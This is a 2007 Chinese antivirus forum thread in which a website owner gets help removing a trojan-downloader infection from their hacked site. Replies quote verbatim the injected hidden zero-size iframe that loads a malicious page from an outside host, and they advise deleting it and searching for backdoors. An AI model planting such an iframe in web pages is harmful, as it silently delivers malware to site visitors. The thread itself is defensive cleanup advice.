瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 【求助】好长时间没来了,请大家帮我看一下这个怎么解决,谢谢。
只有我 - 2007-2-14 17:07:00

感谢大家的帮助,我已经处理结束了。。。。哈哈,这下不怕它了!

处理过程:

有和我相同的情况的人,可以参考一下:
打开index.htmlIndex.asp可以在最下面一行发现这个代码的,删除了就行了!

附原文:
我在朋友家的一台机上上网时,他家装的是KIS6.0,但是,我在上我自己的网站时,却发现……

已检测到: 木马程序 Trojan-Downloader.HTML.Agent.bx    URL: http://www.hack99.cn/hack/xuehu.htm

我闷呢,这个网站明明是一个短信网站,我想可能是某个地方有问题,可找到现在没找到呀。。。。

网站:是签名有,偶就不弄了。。。。

PS:听说好像只有卡巴斯基6.0版出现这个耶,好像是主动防御吧,我也不知,我没用这软件的。
我只想清除了这个,这样,省得别人访问也出现那句话,先谢谢大家了!



。。。。。。不怕不怕,会的人就帮我一下。
hotboy - 2007-2-14 17:17:00
<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
只有我 - 2007-2-14 17:18:00
你也出现了?!怎么解决呀,我就是没找到。。。。。真不知是哪个弄的,哭死
网络骑士HKC - 2007-2-14 17:21:00
你的网站是被人入侵了
主页文件被别人插了句代码:
<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
删掉就可以了

他用的雪狐的模板
估计在你的网站上还留有后门
好好找找吧,一般从文件的修改日期上可以看出来的
只有我 - 2007-2-14 17:26:00
引用:
【网络骑士HKC的贴子】你的网站是被人入侵了
主页文件被别人插了句代码:
<iframe height=0 width=0 src="http://www.hack99.cn/hack/index.html"></iframe>
删掉就可以了

他用的雪狐的模板
估计在你的网站上还留有后门
好好找找吧,一般从文件的修改日期上可以看出来的
………………


偶也看到了呀。。。我用的是动易的,到现在还没找到。
网络骑士HKC - 2007-2-14 17:35:00
用思易找找吧,这玩意“贼的好使”
http://down.chinaz.com/S/12078.asp

顺便翻翻IIS日志看看他是怎么进去的
只有我 - 2007-2-14 17:39:00
引用:
【网络骑士HKC的贴子】用思易找找吧,这玩意“贼的好使”
http://down.chinaz.com/S/12078.asp

顺便翻翻IIS日志看看他是怎么进去的
………………


这个翻日志就不用了。。。。偶不会,再说这个空间是用的2008sh.com的。。。偶不是小马哦,只是说明情况的

偶再试试。。。。。
只有我 - 2007-2-14 19:30:00
。。。。。偶还没弄好。。。。
baohe - 2007-2-15 17:23:00
引用:
【只有我的贴子】偶还是没有弄好,有没有帮我的,谢谢。

我在朋友家的一台机上上网时,他家装的是KIS6.0,但是,我在上我自己的网站时,却发现……

已检测到: 木马程序 Trojan-Downloader.HTML.Agent.bx    URL: http://www.hack99.cn/hack/xuehu.htm

我闷呢,这个网站明明是一个短信网站,我想可能是某个地方有问题,可找到现在没找到呀。。。。

网站:是签名有,偶就不弄了。。。。

PS:听说好像只有卡巴斯基6.0版出现这个耶,好像是主动防御吧,我也不知,我没用这软件的。
我只想清除了这个,这样,省得别人访问也出现那句话,先谢谢大家了!


。。。。。。不怕不怕,会的人就帮我一下。
………………

那网页有个木马下载器
瑞星最新病毒库已经能杀

附件: 1558472007215171358.jpg
只有我 - 2007-2-24 17:44:00

感谢大家的帮助,我已经处理结束了。。。。哈哈,这下不怕它了!

处理过程:

有和我相同的情况的人,可以参考一下:
打开index.htmlIndex.asp可以在最下面一行发现这个代码的,删除了就行了!
1
查看完整版本: 【求助】好长时间没来了,请大家帮我看一下这个怎么解决,谢谢。